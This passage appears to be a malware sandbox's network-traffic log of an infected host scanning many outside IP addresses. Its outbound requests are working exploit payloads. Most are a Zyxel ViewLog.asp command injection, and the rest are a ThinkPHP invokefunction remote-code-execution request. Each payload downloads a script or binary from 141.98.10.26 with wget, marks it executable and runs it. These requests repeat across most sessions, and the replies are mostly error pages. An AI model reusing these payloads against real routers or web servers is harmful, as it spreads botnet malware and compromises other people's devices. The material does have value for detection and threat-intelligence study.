Nov 22, 2023 08:40:35.580765009 CET	19755	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
538	192.168.2.23	58674	62.29.44.10	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:16.861202002 CET	10596	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
539	192.168.2.23	43486	94.122.107.167	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:16.863117933 CET	10596	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
540	192.168.2.23	45362	112.126.102.82	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:17.126729965 CET	10599	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:17.452502012 CET	10638	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:17 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
541	192.168.2.23	40052	112.184.162.161	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:18.751142979 CET	10760	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:19.043798923 CET	10765	IN	HTTP/1.0 301 Redirect
Nov 22, 2023 08:39:19.043819904 CET	10766	IN	Data Raw: 44 61 74 65 3a 20 57 65 64 20 4e 6f 76 20 32 32 20 31 36 3a 33 39 3a 31 38 20 32 30 32 33 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 Data Ascii: Date: Wed Nov 22 16:39:18 2023Pragma: no-cacheCache-Control: no-cacheContent-Type: text/htmlSet-Cookie: (null)Location: http://127.0.0.1:8899/login.asp<html><head></head><body>This document has moved to a new <a href="http://

Session ID	Source IP	Source Port	Destination IP	Destination Port
542	192.168.2.23	47042	112.126.163.197	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:18.763055086 CET	10761	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:19.067429066 CET	10767	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:35:31 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
543	192.168.2.23	45378	112.126.102.82	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:18.805114985 CET	10762	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:19.134970903 CET	10830	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:18 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
544	192.168.2.23	32876	112.25.7.235	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:18.858509064 CET	10762	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:19.259394884 CET	10831	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:39:19 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
545	192.168.2.23	35592	88.221.138.145	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:18.935086966 CET	10764	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:19.119148970 CET	10828	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:39:19 GMT Date: Wed, 22 Nov 2023 07:39:19 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 32 62 35 61 31 36 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 37 35 39 26 23 34 36 3b 65 33 37 33 38 39 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.2b5a1602.1700638759.e373896</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
546	192.168.2.23	51482	88.99.177.12	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:18.940078020 CET	10765	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:39:19.128912926 CET	10829	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:39:19 GMT Server: Apache Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
547	192.168.2.23	55438	95.216.176.242	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:19.325864077 CET	10914	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:19.536715031 CET	10946	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 07:39:19 GMT Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
548	192.168.2.23	44666	95.158.71.202	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:19.328219891 CET	10915	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:20.455255032 CET	11005	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:20.675004005 CET	11070	IN	HTTP/1.1 404 Not Found Date: Wed, 22 Nov 2023 09:17:53 GMT Server: Webs X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff X-XSS-Protection: 1;mode=block Cache-Control: no-store Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
549	192.168.2.23	41786	62.29.25.34	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:19.340400934 CET	10916	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
550	192.168.2.23	47644	31.200.102.74	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:19.343182087 CET	10917	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
551	192.168.2.23	54702	94.120.10.173	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:19.343235016 CET	10918	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
552	192.168.2.23	60566	31.136.107.228	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:39:19.516942024 CET	10944	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:20.103300095 CET	10961	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:21.287097931 CET	11165	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:23.654834032 CET	11426	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:28.518141031 CET	11958	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:37.988781929 CET	13119	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:56.674226999 CET	15327	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:40:35.580765009 CET	19756	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
553	192.168.2.23	37490	95.216.52.28	8080

Timestamp	kBytes transferred	Direction	Data
